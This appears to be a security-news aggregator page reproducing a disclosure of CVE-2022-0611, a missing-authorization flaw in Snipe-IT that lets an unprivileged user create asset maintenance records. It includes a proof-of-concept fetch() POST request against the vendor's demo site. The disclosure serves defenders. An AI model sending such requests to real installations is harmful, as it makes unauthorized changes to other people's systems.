Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2022-0611: Improper Privilege Management in snipe-it

Missing Authorization in Packagist snipe/snipe-it prior to 5.3.11.

CVE
Open in Source
#web#ubuntu#linux#auth#firefox

Description

Unprivilege user can create maintainance for asset

Proof of Concept

1. Create regular user and set DENY to all permissions in asset models.
2. Login as the user and sent bellow request to create maintainance for asset

await fetch("https://demo.snipeitapp.com/hardware/maintenances", {
    "credentials": "include",
    "headers": {
        "User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:92.0) Gecko/20100101 Firefox/92.0",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
        "Accept-Language": "en-US,en;q=0.5",
        "Content-Type": "application/x-www-form-urlencoded",
        "Upgrade-Insecure-Requests": "1",
        "Sec-Fetch-Dest": "document",
        "Sec-Fetch-Mode": "navigate",
        "Sec-Fetch-Site": "same-origin",
        "Sec-Fetch-User": "?1"
    },
    "referrer": "https://demo.snipeitapp.com/hardware/maintenances/create?asset_id=310",
    "body": "_token=Pvc8rsrc7DcKDjEtD6wtmstrGJfc74utYKkVfAh7&asset_id=310&supplier_id=8&asset_maintenance_type=Maintenance&title=mainrain11&start_date=2022-02-03&completion_date=&cost=&notes=by_admin",
    "method": "POST",
    "mode": "cors"
});

Impact

unprivileged user can create maintainance for any asset

Occurrences

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE
CVE-2023-6905
CVE
CVE-2023-6903
CVE
CVE-2023-6904
CVE
CVE-2023-3907
CVE